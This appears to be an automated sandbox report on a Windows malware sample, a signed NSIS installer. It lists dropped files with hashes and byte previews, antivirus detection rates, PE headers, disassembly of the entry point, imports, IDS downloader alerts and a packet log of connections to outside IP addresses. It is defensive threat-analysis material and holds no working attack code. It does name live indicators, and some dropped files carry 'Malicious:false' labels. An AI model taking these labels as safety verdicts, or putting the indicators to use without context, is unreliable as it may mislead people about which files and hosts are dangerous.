                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):329711
                                                                  Entropy (8bit):7.6398387580353155
                                                                  Encrypted:false
                                                                  SSDEEP:6144:Wnb/WRn8NZYlezToyw7s8kuNqZKZdsLCsdDfIS38:WTWRn0Boywg8rZdsWYDAS38
                                                                  MD5:54DAA56B551E061FB6F1295EF32A374E
                                                                  SHA1:250F5859827F66CD522D04CDFFA3829DBD933425
                                                                  SHA-256:9AD1E96273ABFEE679B731DB48243A170704A4934C5D3F17D4C2D3C796AF61C1
                                                                  SHA-512:0A5741E91597AF9F88364DB27494B44A087C3527EE9B643D5FE3B3F23687E3580C8D847A5E53D99933C06BFDFD3A665E3334FAB8A93E00D6B7EDFB28E717E6C1
                                                                  Malicious:false
                                                                  Preview:....3.KK.....l..q.................RR.........RRR......................>.................&..ll........x...;;;;....rr.......d.........XXX.ss.....TTTT...........\\................?.....................@....................................................m.....p.x............t.....-.8.....................................d.|||......;..c.......f...............}}...77..............Z.y....................u.".222.......~~........<...a............d.V./..JJ..................w......5................y.>>........X..)).............II.....444.....X......;........g.......SSSSSSSS.........uu.....'............_..........RR.dddd...-.......*...JJJ..............}.............................w............PP......UUUUUU....o.Y......".....f.....888.`..............--...........c...............BBB.......................}.....$........."""..................,,..oo..z...............llllll.......i.+..@@.............YYY.......................lll.......*.(............aaa.<<<......QQ..{{{....AA.......................G.
                                                                  Process:C:\Users\user\Desktop\ln5S7fIBkY.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):436009
                                                                  Entropy (8bit):1.2582605930205382
                                                                  Encrypted:false
                                                                  SSDEEP:768:hcdhFKp23vdhctpU19YKVceNXiajgLRY2hLsKf/LTWSs9D1bFuYRiQHlWrmcZE+t:T9ogp/vuFYha+YI6vuAYskfI2ByWSlq
                                                                  MD5:BA41A53F0CE12BDF6DDE858C1BB56E67
                                                                  SHA1:28CC8982281E9540750800B87B128ACF3E86E1B4
                                                                  SHA-256:0DDFC3936461A4A299A8B57D2EE5A4C11B057233AE905D2EBBB3641E4D9FD0CE
                                                                  SHA-512:77DDDF113CB001D489B2B4B39E5E953B03A76D72EEABAB0C82FFA8C8E1677755A75740A98D32871CB086AE65B0BD2EEE1319BD87C59CC98169ECBE60EE83348E
                                                                  Malicious:false
                                                                  Preview:.............;......................0........;.......................jh<.i....................................................B................O.(...................................................................................M....6....................c.............................:............A.........................#............@...............................................................................I...........\..........................k..................................H.............................................................................1.......l....?.[....................)*....~..........K..................................................D..................U.a............................C........................................................................=.............o.........................g...............1.......s..H................y.................t....[.....................i..........'p.................................g.....................$......
                                                                  Process:C:\Users\user\Desktop\ln5S7fIBkY.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):356
                                                                  Entropy (8bit):4.234486179912683
                                                                  Encrypted:false
                                                                  SSDEEP:6:URWM/KBzGLFXivfRO5BViaS035LKlewERn62GFVhyzpFiqizhRc48RV1CnmMWIX+:UkgK4Lg3ROI0pLYT4Ahj3zKRV67WIXC7
                                                                  MD5:E514D8FDFF4A7AC568F2DED93DADB44E
                                                                  SHA1:DF81016124C8941F2D9F75B1BCB3D951F911626C
                                                                  SHA-256:687D18EA6077CE147AC2358AEF39F33119CC6C46A0A38C46AE444E75F595EE74
                                                                  SHA-512:E6E8734937C7F6CDF0FA3F25861A42CE31485555EF236B2922C0E90AA22C1B2D4BBB757AA13BF9C41948DAC261CF042565D2608074246000D479B143962B4CF3
                                                                  Malicious:false
                                                                  Preview:udkrystallisations kubong palisse duodesen raadighedsbelbene monoamino..hookman damperens varsel.endetarmsaabningens lection udvidelsestakts statometer diggers scandalized,ectocarpaceous carosella drattede stodderprinsen gingkoes,afvrgelsernes moravianized skotte.udsalgssteder fayal uafmrket svampelagenes mispronouncement forhaeng modemerne deskription..
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Category:dropped
                                                                  Size (bytes):678408
                                                                  Entropy (8bit):7.739883092097999
                                                                  Encrypted:false
                                                                  SSDEEP:12288:k2QJ9o2sW3B9o2G2/6SkwwOeO01ZAao2tezqrVcO5sZYw6bhyWjX53XOo:kv9o2sW3B9oV2iSkwwOe/U2HVcaNhyaH
                                                                  MD5:E38257F3EAA78E2DCA3C3063B05EAA70
                                                                  SHA1:250D9151F64818A8BFA51D3714A6DDB214303495
                                                                  SHA-256:4F0C13BF16B4E53B1513E2B268AEC15C6C2A043F88A58DEA69C88E25EB920853
                                                                  SHA-512:483DC9CBEF3E26973E0D51601B146472C64B0E2C95B0C98154BD5C2A49AFCE5B867E9ED56FD9ED9D9E939A0C9C023413AA775078B22873CE267DB55F2A7C1BCC
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Avira, Detection: 100%
                                                                  • Antivirus: ReversingLabs, Detection: 62%
                                                                  • Antivirus: Virustotal, Detection: 68%, Browse
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:.....l3............@...........................?.....7N....@..........................................@=..|.......... P...............................................................................................text....d.......d.................. ..`.rdata...............h..............@..@.data...8.9..........|..............@....ndata........:..........................rsrc....|...@=..~..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):26
                                                                  Entropy (8bit):3.95006375643621
                                                                  Encrypted:false
                                                                  SSDEEP:3:ggPYV:rPYV
                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                  Malicious:true
                                                                  Preview:[ZoneTransfer]....ZoneId=0
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.739883092097999
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:ln5S7fIBkY.exe
                                                                  File size:678'408 bytes
                                                                  MD5:e38257f3eaa78e2dca3c3063b05eaa70
                                                                  SHA1:250d9151f64818a8bfa51d3714a6ddb214303495
                                                                  SHA256:4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853
                                                                  SHA512:483dc9cbef3e26973e0d51601b146472c64b0e2c95b0c98154bd5c2a49afce5b867e9ed56fd9ed9d9e939a0c9c023413aa775078b22873ce267db55f2a7c1bcc
                                                                  SSDEEP:12288:k2QJ9o2sW3B9o2G2/6SkwwOeO01ZAao2tezqrVcO5sZYw6bhyWjX53XOo:kv9o2sW3B9oV2iSkwwOe/U2HVcaNhyaH
                                                                  TLSH:21E41249B240C5AFC6FAF93484A6EB58D4B77CB54C21494B32D43B89EEBE765680F403
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....oZ.................d....:....
                                                                  Icon Hash:397d694151710f3c
                                                                  Entrypoint:0x40336c
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:true
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x5A6FED1F [Tue Jan 30 03:57:19 2018 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                  Signature Valid:false
                                                                  Signature Issuer:CN="Dacryagogue Embedsmandsvldet Unimpairable ", E=Unresidual@Raviv129.Mai, L=Saint-Trimo\xebl, S=Bretagne, C=FR
                                                                  Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                  Error Number:-2146762487
                                                                  Not Before, Not After
                                                                  • 01/01/2024 06:24:21 31/12/2026 06:24:21
                                                                  Subject Chain
                                                                  • CN="Dacryagogue Embedsmandsvldet Unimpairable ", E=Unresidual@Raviv129.Mai, L=Saint-Trimo\xebl, S=Bretagne, C=FR
                                                                  Version:3
                                                                  Thumbprint MD5:C460A96C1AB51DCA34DAB22C5881BF64
                                                                  Thumbprint SHA-1:FF1CBB7C651BAC0F6508BA5145BED3255D9B2713
                                                                  Thumbprint SHA-256:9744D1CECD2B0227213922EA63CB5276512CC4B4CD94F7C6201E13BBB8FFA6DB
                                                                  Serial:4CCA096567133E030BBCA9C77451B4BF9A8E31E2
                                                                  Instruction
                                                                  sub esp, 000002D4h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  push 00000020h
                                                                  pop edi
                                                                  xor ebx, ebx
                                                                  push 00008001h
                                                                  mov dword ptr [esp+14h], ebx
                                                                  mov dword ptr [esp+10h], 0040A2E0h
                                                                  mov dword ptr [esp+1Ch], ebx
                                                                  call dword ptr [004080A8h]
                                                                  call dword ptr [004080A4h]
                                                                  and eax, BFFFFFFFh
                                                                  cmp ax, 00000006h
                                                                  mov dword ptr [007A8A2Ch], eax
                                                                  je 00007F805CAC0663h
                                                                  push ebx
                                                                  call 00007F805CAC3915h
                                                                  cmp eax, ebx
                                                                  je 00007F805CAC0659h
                                                                  push 00000C00h
                                                                  call eax
                                                                  mov esi, 004082B0h
                                                                  push esi
                                                                  call 00007F805CAC388Fh
                                                                  push esi
                                                                  call dword ptr [00408150h]
                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                  cmp byte ptr [esi], 00000000h
                                                                  jne 00007F805CAC063Ch
                                                                  push 0000000Ah
                                                                  call 00007F805CAC38E8h
                                                                  push 00000008h
                                                                  call 00007F805CAC38E1h
                                                                  push 00000006h
                                                                  mov dword ptr [007A8A24h], eax
                                                                  call 00007F805CAC38D5h
                                                                  cmp eax, ebx
                                                                  je 00007F805CAC0661h
                                                                  push 0000001Eh
                                                                  call eax
                                                                  test eax, eax
                                                                  je 00007F805CAC0659h
                                                                  or byte ptr [007A8A2Fh], 00000040h
                                                                  push ebp
                                                                  call dword ptr [00408044h]
                                                                  push ebx
                                                                  call dword ptr [004082A0h]
                                                                  mov dword ptr [007A8AF8h], eax
                                                                  push ebx
                                                                  lea eax, dword ptr [esp+34h]
                                                                  push 000002B4h
                                                                  push eax
                                                                  push ebx
                                                                  push 0079FEE0h
                                                                  call dword ptr [00408188h]
                                                                  push 0040A2C8h
                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804
                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d40000x27cc0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xa50200x9e8.data
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x64000x6400eed0986138e3ef22dbb386f4760a55c0False0.6783203125data6.511089687733535IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0xa0000x39eb380x60009e0c528682cd2747c63b7ba39c2cc23unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .ndata0x3a90000x2b0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x3d40000x27cc00x27e003ff3f9c979a556a14466f3e7fca5a16aFalse0.5468566320532915data6.448700520091383IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x3d44480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2851798178161599
                                                                  RT_ICON0x3e4c700xb85cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9977328587168404
                                                                  RT_ICON0x3f04d00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4055857345299953
                                                                  RT_ICON0x3f46f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.48091286307053943
                                                                  RT_ICON0x3f6ca00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.6081144465290806
                                                                  RT_ICON0x3f7d480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5914179104477612
                                                                  RT_ICON0x3f8bf00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6864754098360656
                                                                  RT_ICON0x3f95780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.7044223826714802
                                                                  RT_ICON0x3f9e200x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.4371951219512195
                                                                  RT_ICON0x3fa4880x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.5173410404624278
                                                                  RT_ICON0x3fa9f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.8156028368794326
                                                                  RT_ICON0x3fae580x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.5255376344086021
                                                                  RT_ICON0x3fb1400x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.6418918918918919
                                                                  RT_DIALOG0x3fb2680x120dataEnglishUnited States0.5138888888888888
                                                                  RT_DIALOG0x3fb3880x11cdataEnglishUnited States0.6056338028169014
                                                                  RT_DIALOG0x3fb4a80xc4dataEnglishUnited States0.5918367346938775
                                                                  RT_DIALOG0x3fb5700x60dataEnglishUnited States0.7291666666666666
                                                                  RT_GROUP_ICON0x3fb5d00xbcdataEnglishUnited States0.648936170212766
                                                                  RT_VERSION0x3fb6900x2f0SysEx File - IDPEnglishUnited States0.4773936170212766
                                                                  RT_MANIFEST0x3fb9800x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                  DLLImport
                                                                  KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                  USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                  SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                  ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                  COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States
                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2025-01-10T16:02:40.162656+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949861172.217.16.206443TCP
                                                                  2025-01-10T16:02:44.961622+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949897193.122.6.16880TCP
                                                                  2025-01-10T16:02:46.586583+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949897193.122.6.16880TCP
                                                                  2025-01-10T16:02:47.164708+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949915104.21.112.1443TCP
                                                                  2025-01-10T16:02:47.867821+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949921193.122.6.16880TCP
                                                                  2025-01-10T16:02:48.406269+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949924104.21.112.1443TCP
                                                                  2025-01-10T16:02:49.686592+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949933104.21.112.1443TCP
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 10, 2025 16:02:39.118305922 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:39.118366003 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:39.118490934 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:39.148956060 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:39.148978949 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:39.782370090 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:39.782444000 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:39.783541918 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:39.783607960 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:39.839663029 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:39.839679956 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:39.840023994 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:39.840081930 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:39.843044043 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:39.883337021 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:40.162657976 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:40.162718058 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:40.164222002 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:40.164264917 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:40.164273024 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:40.164464951 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:40.166613102 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:40.166629076 CET44349861172.217.16.206192.168.2.9
                                                                  Jan 10, 2025 16:02:40.166637897 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:40.166676044 CET49861443192.168.2.9172.217.16.206
                                                                  Jan 10, 2025 16:02:40.190700054 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:40.190742016 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:40.190895081 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:40.191169024 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:40.191179991 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:40.840873957 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:40.840986967 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:40.844942093 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:40.844959974 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:40.845257044 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:40.845356941 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:40.845704079 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:40.887366056 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.554507017 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.554718971 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.560446978 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.560560942 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.572968006 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.573082924 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.573088884 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.573327065 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.579253912 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.579323053 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.643048048 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.643121004 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.643168926 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.643177032 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.643197060 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.643280983 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.643531084 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.643779039 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.643785000 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.643975019 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.649981976 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.650113106 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.650119066 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.652434111 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.656167984 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.656260014 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.656266928 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.656315088 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.662389994 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.662677050 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.662683964 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.662777901 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.668603897 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.668915033 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.668921947 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.669172049 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.674913883 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.674968004 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.674985886 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.675152063 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.681174994 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.681349993 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.681355953 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.681690931 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.686973095 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.687025070 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.687033892 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.687180042 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.693825006 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.693875074 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.693882942 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.693938971 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.698512077 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.698631048 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.698637009 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.698775053 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.704289913 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.704432964 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.710840940 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.710952997 CET49871443192.168.2.9142.250.181.225
                                                                  Jan 10, 2025 16:02:43.710958958 CET44349871142.250.181.225192.168.2.9
                                                                  Jan 10, 2025 16:02:43.711081028 CET49871443192.168.2.9142.250.181.225
